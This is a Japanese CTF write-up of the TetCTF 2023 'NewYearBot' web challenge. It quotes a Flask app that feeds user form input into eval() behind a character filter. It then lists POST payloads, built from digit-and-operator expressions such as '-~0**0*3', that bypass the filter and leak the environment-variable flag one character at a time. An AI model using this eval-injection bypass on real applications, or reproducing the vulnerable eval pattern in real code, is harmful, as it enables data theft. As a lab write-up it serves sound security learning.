CTF日本語サイト : TetCTF 2023 NewYearBot

NewYearBot
100
Description
New Year New Code! My friend decide to learn code in new year, here his very first website: http://172.105.120.180:9999/
File
He said it is very secure because he is very strict on what user can input, can you check?
https://drive.google.com/file/d/1tU18ePUAHHYpxJ9QhdVKBpuBm_eXy--r/view?usp=sharing
Note
Don't generate excessive load. Scanning/Dirbust is not needed.
Author
@tsug0d

Flaskを使用したWebアプリケーション。フラグを環境変数から読み込んでいる。

from flask import Flask, request
import re, random, os

app = Flask(__name__)
FL4G = os.environ.get('secret_flag')

eval関数を呼び出しているので、typeにFL4G、numberに添え字を指定することで1文字ずつ取得できそう。

        debug = request.args.get("debug")
        if request.method == 'POST':
            greetType = request.form["type"]
            greetNumber = request.form["number"]
            if greetType == "greeting_all":
                greeting = random_greet(random.choice(NewYearCategoryList))
            else:
                try:
                    if greetType != None and greetNumber != None:
                        greetNumber = re.sub(r'\s+', '', greetNumber)
                        if greetType.isidentifier() == True and botValidator(greetNumber) == True:
                            if len("%s[%s]" % (greetType, greetNumber)) > 20:
                                greeting = fail
                            else:
                                greeting = eval("%s[%s]" % (greetType, greetNumber))
                            try:
                                if greeting != fail and debug != None:
                                    greeting += "<br>You're choosing %s, it has %s quotes"%(greetType, len(eval(greetType)))

入力チェックで数字は0～5しか使えないが、()-*~^|などの記号は使える。

def botValidator(s):
    # Number only!
    for c in s:
        if (57 < ord(c) < 123):
            return False
    # The number should only within length of greeting list.
    n = "".join(x for x in re.findall(r'\d+', s))
    if n.isnumeric():
        ev = "max("
        for gl in NewYearCategoryList:
            ev += "len(%s)," % gl 
        l = eval(ev[:-1]+")")
        if int(n) > (l-1):
            return False
    return True

Fiddlerを使ってPOSTデータを次のようにいじる。次のように1文字ずつフラグ文字を取得できる。

type=FL4G&number=0 #0 T
type=FL4G&number=1 #1 e
type=FL4G&number=2 #2 t
type=FL4G&number=3 #3 C
type=FL4G&number=4 #4 T
type=FL4G&number=5 #5 F
type=FL4G&number=-~0**0*3 #6 {
type=FL4G&number=~(~0**0*4) #7 J
type=FL4G&number=-~0**0*4 #8 u
type=FL4G&number=~(~0**0*5) #9 S
type=FL4G&number=-~0**0*5 #10 t
type=FL4G&number=0**0-~0**0*5 #11 _
type=FL4G&number=~0**0*~0**0*3 #12 F
type=FL4G&number=-(-~0-~0**0*5) #-11=13 0
type=FL4G&number=~0**0*5 #-10=14 r
type=FL4G&number=-~(~0**0*5) #-9=15 F
type=FL4G&number=~0**0*4 #-8=16 u
type=FL4G&number=-~(~0**0*4) #-7=17 n
type=FL4G&number=~0**0*3 #-6=18 n
type=FL4G&number=-5 #-5=19 (
type=FL4G&number=-4 #-4=20 ^
type=FL4G&number=-3 #-3=21 _
type=FL4G&number=-2 #-2=22 ^
type=FL4G&number=-1 #-1=23 }